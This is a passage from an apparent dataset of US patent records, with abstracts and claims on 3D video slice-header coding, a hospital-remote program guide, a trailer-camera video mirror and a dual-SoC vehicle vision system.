receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; encoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determining common syntax elements for a second slice from the slice header of the first slice; and encoding the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 29. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 30. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 31. 
The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 32. The method of claim 28, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 33. The method of claim 28, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax table, and a prediction weight table. 34. The method of claim 28, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the method further comprising:
determining a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 35. The method of claim 28, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 36. The method of claim 28, further comprising:
signaling an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 37. A device for encoding data, comprising a video encoder configured to receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice, receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit, encode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice, determine common syntax elements for a second slice from the slice header of the first slice, and encode the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 38. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 39. 
The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 40. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 41. The device of claim 37, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 42. The device of claim 37, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax table, and a prediction weight table. 43. The device of claim 37, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, and wherein the video encoder is further configured to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 44. The device of claim 37, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 45. The device of claim 37, wherein the video encoder is further configured to:
signal an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 46. A computer program product comprising a computer-readable storage medium having stored thereon instructions that, when executed, cause a processor of a video encoding device to:
receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; code a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determine common syntax elements for a second slice from the slice header of the first slice; and code the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 47. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 48. 
The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 49. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 50. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 51. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax table, and a prediction weight table. 52. The computer-readable storage medium of claim 46, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, wherein the instructions further cause a processor of a video encoding device to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 53. A device for processing video data, comprising:
means for receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; means for receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; means for encoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; means for determining common syntax elements for a second slice from the slice header of the first slice; and means for encoding the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, without repeating values for syntax elements that are common to the first slice. 54. The device of claim 53, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. | 2,400 |
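The header-prediction scheme recited in these claims — signal the second slice's header without repeating values shared with the first slice's header, and let the decoder inherit the rest — can be sketched as below. This is an illustrative Python sketch only; the field names (`pps_id`, `slice_qp_delta`, `start_position`, and so on) are hypothetical stand-ins, not syntax element names taken from the patent or any codec specification.

```python
# Hedged sketch of slice-header prediction between a texture slice and the
# corresponding depth slice. Field names are illustrative only.

def encode_second_header(first_header, second_header):
    """Keep only the syntax elements whose values differ from the first
    slice's header; common values are omitted from the bitstream."""
    return {k: v for k, v in second_header.items()
            if first_header.get(k) != v}

def decode_second_header(first_header, signaled):
    """Reconstruct the full header: inherit common elements from the first
    slice, then apply the explicitly signaled overrides."""
    header = dict(first_header)
    header.update(signaled)
    # If no starting position was signaled in either header, default it to
    # zero (mirrors the rule in claims 7, 16, 25, 34, 43 and 52).
    header.setdefault("start_position", 0)
    return header

texture_header = {"pps_id": 3, "frame_num": 7, "pic_order_cnt": 14,
                  "slice_qp_delta": 2, "start_position": 0}
depth_header = {"pps_id": 3, "frame_num": 7, "pic_order_cnt": 14,
                "slice_qp_delta": -1, "start_position": 0}

signaled = encode_second_header(texture_header, depth_header)
# Only the differing quantization parameter delta needs to be signaled.
restored = decode_second_header(texture_header, signaled)
```

In this toy example only `slice_qp_delta` would be transmitted for the depth slice, which is consistent with the dependent claims that keep the quantization parameter difference explicitly signaled in the second slice header.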
9,105 | 9,105 | 15,990,819 | 2,421 | Methods and apparatus for improving channel browsing experience for users by presenting an automatically appearing and automatically scrolling program guide are described. The methods and apparatus are well suited for use with remote control devices with limited numbers of input buttons, e.g., under five buttons, but can be used with remote controls with more buttons. The program guide can be used to allow access to a grid guide to users of hospital remotes or other remotes with limited input keys, e.g., an up down arrow and/or a power button. The method in some embodiments uses time spent on a channel in combination with user selection of an input key to determine an action to be taken, e.g., enter or display the program grid guide and/or select a channel and/or corresponding program being displayed in the grid guide. | 1. A method of operating a device to implement a program guide, comprising:
modifying a program channel lineup to generate a modified program lineup, said modifying the program channel lineup including placing an automatic guide channel at a first position and at a second position in the program channel lineup, said first and second positions being adjacent, in said modified program lineup, to a position of the current channel being displayed; and taking an action based on the modified program channel lineup in response to a user pressing an up button or a down button on a remote control. 2. The method of claim 1, wherein said step of modifying a program channel lineup includes adding the automatic program guide channel to the program channel lineup above the current channel being displayed and also adding the automatic program guide channel to the program channel lineup below the current channel being displayed. 3. The method of claim 2, wherein taking an action based on the modified program channel lineup in response to the user pressing an up or down button on the remote control includes tuning to the automatic program guide channel in response to the user pressing said up or down button on the remote control. 4. The method of claim 3, wherein said automatic program guide channel has a single channel number which is placed both above and below the channel number of the current channel in said modified program channel lineup. 5. The method of claim 3, further comprising:
automatically displaying a program guide in response to the user channel change selection indicated by the user pressing an up or down button. 6. The method of claim 5, further comprising:
automatically scrolling through program channels while displaying said program guide; and wherein automatically displaying a program guide includes: highlighting a portion of the displayed program guide, said highlighted portion including a program channel. 7. The method of claim 5, further comprising:
in response to a user channel change selection being made while said program guide is being displayed, switching from displaying said program guide to outputting said highlighted program channel. 8. The method of claim 2,
wherein said remote control does not include number keys for controlling program channel selections. 9. The method of claim 8,
wherein said user device is a set top box in a hospital or rehabilitation center; and wherein said remote control includes only up and down arrow buttons for controlling program channel selections; and wherein said remote control is a wired hospital bed remote control device. 10. The method of claim 9, further comprising:
monitoring user input; and changing a scroll rate used to control automatic channel scrolling during presentation of said program guide as a function of said monitored input. 11. The method of claim 10, wherein monitoring user input includes monitoring the time between user selection of channel change buttons. 12. The method of claim 1, further comprising:
displaying a current channel prior to performing said step of modifying the program channel lineup. 13. The method of claim 1, wherein a program guide is not displayed while displaying the current channel. 14. A system comprising:
a display; and a user device coupled to the display, the user device including a processor configured to control the user device to:
modify a program channel lineup to generate a modified program lineup, said modifying the program channel lineup including placing an automatic guide channel at a first position and at a second position in the program channel lineup, said first and second positions being adjacent, in said modified program lineup, to a position of the current channel being displayed; and
take an action based on the modified program channel lineup in response to a user pressing an up button or a down button on a remote control. 15. The system of claim 14, wherein said processor controls the user device, as part of modifying the program channel lineup, to add the automatic program guide channel to the program channel lineup above the current channel being displayed and also add the automatic program guide channel to the program channel lineup below the current channel being displayed. 16. The system of claim 15, wherein said processor controls the user device, as part of taking an action based on the modified program channel lineup in response to the user pressing an up or down button on the remote control, to tune to the automatic program guide channel in response to the user pressing said up or down button on the remote control. 17. The system of claim 16, wherein said automatic program guide channel has a single channel number which is placed both above and below the channel number of the current channel in said modified program channel lineup. 18. The system of claim 16, wherein said processor further controls the user device to automatically display a program guide in response to the user channel change selection indicated by the user pressing an up or down button.
take an action based on the modified program channel lineup in response to a user pressing an up button or a down button on a remote control. 15. The system of claim 14, wherein said processor controls the user device, as part of modifying the program channel lineup, to add the automatic program guide channel to the program channel lineup above the current channel being displayed and also add the automatic program guide channel to the program channel lineup below the current channel being displayed. 16. The system of claim 15, wherein said processor controls the user device, as part of taking an action based on the modified program channel lineup in response to the user pressing an up or down button on the remote control to tune to the automatic program guide channel in response to the user pressing said up or down button on the remote control. 17. The system of claim 16, wherein said automatic program guide channel has a single channel number which is placed both above and below the channel number of the current channel in said modified program channel lineup. 18. The system of claim 16, wherein said processor further controls the user device to automatically display a program guide in response to the user channel change selection indicated by the user pressing an up or down button. | 2,400 |
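The lineup modification and key handling recited in claims 1-3 above can be sketched as follows. This is a minimal illustration, not the patented implementation; `GUIDE`, the list-based lineup, and the function names are hypothetical stand-ins:

```python
GUIDE = "AG"  # hypothetical id for the automatic program guide channel

def modify_lineup(lineup, current):
    """Insert the guide channel directly above and directly below the
    channel currently being displayed (claims 1 and 2)."""
    i = lineup.index(current)
    return lineup[:i] + [GUIDE, current, GUIDE] + lineup[i + 1:]

def on_arrow(lineup, current, key):
    """Pressing up or down from the current channel tunes to the adjacent
    entry of the modified lineup, i.e. the guide channel (claim 3)."""
    modified = modify_lineup(lineup, current)
    i = modified.index(current)
    return modified[i - 1] if key == "up" else modified[i + 1]
```

Note that, as in claim 4, the same guide channel id appears both above and below the current channel, so either arrow key lands on the guide.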
9,106 | 9,106 | 16,170,075 | 2,482 | A video mirror system includes an interior rearview mirror assembly and a video display screen disposed in a mirror head and behind a reflective element of the mirror assembly. When the video mirror system is operating in a mirror mode, the video display screen is deactivated and the reflective element provides a reflected rearward view for the driver of the vehicle. When the video mirror system is in a display mode, the video display screen is activated and displays video images viewable through the reflective element. The video display screen, when activated, displays video images derived from image data captured by a vehicle-mounted rear viewing camera or, with a trailer hitched to the vehicle, a trailer-mounted rear viewing camera. The displayed video images may correspond to a rearward view similar to the field of view provided by the reflective element when in the mirror mode. | 1. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an interior portion of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived from image data 
captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, displays video images derived from image data captured by the trailer-mounted rear viewing camera; and wherein the displayed video images provide a rearward view that is similar to the mirror-reflected rearward view provided by said transflective mirror reflector of said transflective mirror reflective element when said video mirror system operates in the mirror mode. 2. The video mirror system of claim 1, wherein the trailer-mounted rear viewing camera comprises an analog camera. 3. The video mirror system of claim 1, wherein the trailer-mounted rear viewing camera comprises an imaging array having at least one million pixels. 4. The video mirror system of claim 1, wherein said trailer-mounted rear viewing camera comprises an imaging array having at least two million pixels. 5. The video mirror system of claim 1, wherein said video mirror system, responsive to determination of hitching to the vehicle of the trailer with the trailer-mounted rear viewing camera, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. 6. The video mirror system of claim 1, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, said video display screen displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera. 7. 
The video mirror system of claim 1, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, said video display screen displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 8. The video mirror system of claim 1, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 9. The video mirror system of claim 1, wherein the vehicle-mounted rear viewing camera comprises a digital camera, and wherein the trailer-mounted rear viewing camera comprises an analog camera. 10. The video mirror system of claim 1, wherein said mirror head and said transflective mirror reflective element are adjustable relative to the interior portion of the vehicle between (i) a mirror mode orientation, where said video mirror system operates in the mirror mode and the driver of the vehicle views rearward of the vehicle via said transflective mirror reflective element, and (ii) a display mode orientation, where said video mirror system operates in the display mode and said video display screen is activated and the driver of the vehicle views displayed video images through said transflective mirror reflective element. 11. The video mirror system of claim 10, wherein said mirror head and said transflective mirror reflective element pivot about a horizontal pivot axis between the mirror mode orientation and the display mode orientation. 12. The video mirror system of claim 1, wherein the interior portion of the vehicle comprises an in-cabin surface of a windshield of the vehicle. 13. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an in-cabin surface of a windshield of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived 
from image data captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, displays video images derived from image data captured by the trailer-mounted rear viewing camera; and wherein said video mirror system, responsive to determination of hitching to the vehicle of the trailer with the trailer-mounted rear viewing camera, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. 14. The video mirror system of claim 13, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, said video display screen displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera. 15. The video mirror system of claim 13, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, said video display screen displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 16. The video mirror system of claim 13, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 17. 
The video mirror system of claim 13, wherein said mirror head and said transflective mirror reflective element are adjustable relative to the windshield of the vehicle between (i) a mirror mode orientation, where said video mirror system operates in the mirror mode and the driver of the vehicle views rearward of the vehicle via said transflective mirror reflective element, and (ii) a display mode orientation, where said video mirror system operates in the display mode and said video display screen is activated and the driver of the vehicle views displayed video images through said transflective mirror reflective element, and wherein said mirror head and said transflective mirror reflective element pivot about a horizontal pivot axis between the mirror mode orientation and the display mode orientation. 18. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an interior portion of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived from image data 
captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera; and wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 19. The video mirror system of claim 18, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 20. The video mirror system of claim 19, wherein said display device, responsive to receipt of a wireless communication from said trailer-mounted rear viewing camera indicative of the trailer with the trailer-mounted rear viewing camera being hitched to the vehicle, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. | 2,400 |
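The source-selection behavior recited in claims 1, 6-7 and 13-15 of the video mirror system reduces to a small decision table, sketched below. This is a hypothetical illustration (names and return values are assumptions, not the patented implementation):

```python
def select_video_source(mode, trailer_hitched, gear):
    """Return (source, region) for the display: mirror mode blanks the
    screen; display mode uses the vehicle camera, or the trailer camera
    (cropped by selected gear) when a trailer is hitched."""
    if mode == "mirror":
        return None, None                 # screen off; reflector provides the view
    if not trailer_hitched:
        return "vehicle_camera", "full"
    if gear == "forward":
        return "trailer_camera", "upper"  # upper region of the camera's FOV
    if gear == "reverse":
        return "trailer_camera", "lower"  # lower region of the camera's FOV
    return "trailer_camera", "full"
```

Per claims 5 and 13, detecting that a trailer with a camera has been hitched would additionally force `mode` to display automatically; that trigger is outside this sketch.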
9,107 | 9,107 | 15,421,483 | 2,486 | A vision system for a vehicle includes at least one camera disposed at a vehicle and having an image sensor operable to capture image data. A display is operable to display video images for viewing by a driver of the vehicle during normal operation of the vehicle. A first system on chip (SoC) receives captured image data and processes the received captured image data for machine vision. The first SoC, responsive to image processing of the received captured image data, generates an output for a driver assistance system of the vehicle. A second system on chip (SoC) receives captured image data and communicates the image data to the display. | 1. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; a first system on a chip (SoC) that includes an image signal processor that receives image data captured by said camera and converts the received image data to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; a second system on a chip (SoC) that receives image data captured by said camera and communicates unconverted image data to said display; and wherein said display displays images derived from the unconverted image data received from said second SoC. 2. The vision system of claim 1, wherein said second SoC, responsive to receiving captured image data, communicates video images in a raw image format to said display. 3. The vision system of claim 2, wherein said second SoC communicates video images in the raw image format upon initial startup of the vehicle and said camera. 4. The vision system of claim 3, wherein said second SoC is able to communicate video images upon initial startup of the vehicle and said camera while said first SoC is warming up and not yet able to process the converted image data. 5. The vision system of claim 1, wherein said second SoC, responsive to receiving captured image data, communicates the image data upon initial startup of the vehicle and said camera. 6. The vision system of claim 1, wherein said second SoC converts raw video image data to an output format suitable for display and communicates the output to said display. 7. 
The vision system of claim 1, wherein video images communicated by said second SoC are based on captured image data that is not processed by said first SoC. 8. The vision system of claim 7, wherein said second SoC applies digital sharpening, enhanced contrast and enhanced saturated color to the captured image data for generating enhanced video images for said display. 9. The vision system of claim 1, wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle. 10. The vision system of claim 1, wherein the image data communicated by said second SoC is communicated to said display via a communication bus of the vehicle. 11. The vision system of claim 1, wherein the driver assistance system comprises at least one of a backup assist system, an adaptive cruise control system, a headlamp control system and a lane departure warning system. 12. The vision system of claim 1, wherein said at least one camera comprises a plurality of cameras disposed at the vehicle. 13. The vision system of claim 1, wherein said camera comprises a smart camera module comprising said image sensor, said first SoC and said second SoC. 14. The vision system of claim 13, wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle. 15. The vision system of claim 13, wherein said second SoC communicates video images to said display via a communication bus of the vehicle. 16. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; wherein said camera comprises a first system on a chip (SoC) that includes an image signal processor that converts image data captured by said camera to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; wherein said camera comprises a second system on a chip (SoC) that communicates unconverted image data captured by said camera to said display; wherein said display displays images derived from the unconverted image data received from said second SoC; and wherein video images communicated by said second SoC are based on captured image data that is not processed by said first SoC. 17. The vision system of claim 16, wherein said second SoC communicates video images in a raw image format upon initial startup of the vehicle and said camera. 18. The vision system of claim 17, wherein said second SoC is able to communicate video images upon initial startup of the vehicle and said camera while said first SoC is warming up and not yet able to process the converted image data. 19. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; wherein said camera comprises a first system on a chip (SoC) that includes an image signal processor that converts image data captured by said camera to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle; wherein said camera comprises a second system on a chip (SoC) that, responsive to said camera capturing image data, communicates video images in a raw image format to said display; wherein said second SoC communicates video images in the raw image format upon initial startup of the vehicle and said camera; wherein the image data communicated by said second SoC is communicated to said display via the communication bus of the vehicle; and wherein said display displays images derived from the communicated video images received from said second SoC. 20. The vision system of claim 19, wherein the driver assistance system comprises at least one of a backup assist system, an adaptive cruise control system, a headlamp control system and a lane departure warning system. | A vision system for a vehicle includes at least one camera disposed at a vehicle and having an image sensor operable to capture image data. A display is operable to display video images for viewing by a driver of the vehicle during normal operation of the vehicle. A first system on chip (SoC) receives captured image data and processes the received captured image data for machine vision. 
The first SoC, responsive to image processing of the received captured image data, generates an output for a driver assistance system of the vehicle. A second system on chip (SoC) receives captured image data and communicates the image data to the display.1. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; a first system on a chip (SoC) that includes an image signal processor that receives image data captured by said camera and converts the received image data to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; a second system on a chip (SoC) that receives image data captured by said camera and communicates unconverted image data to said display; and wherein said display displays images derived from the unconverted image data received from said second SoC. 2. The vision system of claim 1, wherein said second SoC, responsive to receiving captured image data, communicates video images in a raw image format to said display. 3. The vision system of claim 2, wherein said second SoC communicates video images in the raw image format upon initial startup of the vehicle and said camera. 4. The vision system of claim 3, wherein said second SoC is able to communicate video images upon initial startup of the vehicle and said camera while said first SoC is warming up and not yet able to process the converted image data. 5. The vision system of claim 1, wherein said second SoC, responsive to receiving captured image data, communicates the image data upon initial startup of the vehicle and said camera. 6. The vision system of claim 1, wherein said second SoC converts raw video image data to an output format suitable for display and communicates the output to said display. 7. 
The vision system of claim 1, wherein video images communicated by said second SoC are based on captured image data that is not processed by said first SoC. 8. The vision system of claim 7, wherein said second SoC applies digital sharpening, enhanced contrast and enhanced saturated color to the captured image data for generating enhanced video images for said display. 9. The vision system of claim 1, wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle. 10. The vision system of claim 1, wherein the image data communicated by said second SoC is communicated to said display via a communication bus of the vehicle. 11. The vision system of claim 1, wherein the driver assistance system comprises at least one of a backup assist system, an adaptive cruise control system, a headlamp control system and a lane departure warning system. 12. The vision system of claim 1, wherein said at least one camera comprises a plurality of cameras disposed at the vehicle. 13. The vision system of claim 1, wherein said camera comprises a smart camera module comprising said image sensor, said first SoC and said second SoC. 14. The vision system of claim 13, wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle. 15. The vision system of claim 13, wherein said second SoC communicates video images to said display via a communication bus of the vehicle. 16. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; wherein said camera comprises a first system on a chip (SoC) that includes an image signal processor that converts image data captured by said camera to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; wherein said camera comprises a second system on a chip (SoC) that communicates unconverted image data captured by said camera to said display; wherein said display displays images derived from the unconverted image data received from said second SoC; and wherein video images communicated by said second SoC are based on captured image data that is not processed by said first SoC. 17. The vision system of claim 16, wherein said second SoC communicates video images in a raw image format upon initial startup of the vehicle and said camera. 18. The vision system of claim 17, wherein said second SoC is able to communicate video images upon initial startup of the vehicle and said camera while said first SoC is warming up and not yet able to process the converted image data. 19. A vision system for a vehicle, said vision system comprising:
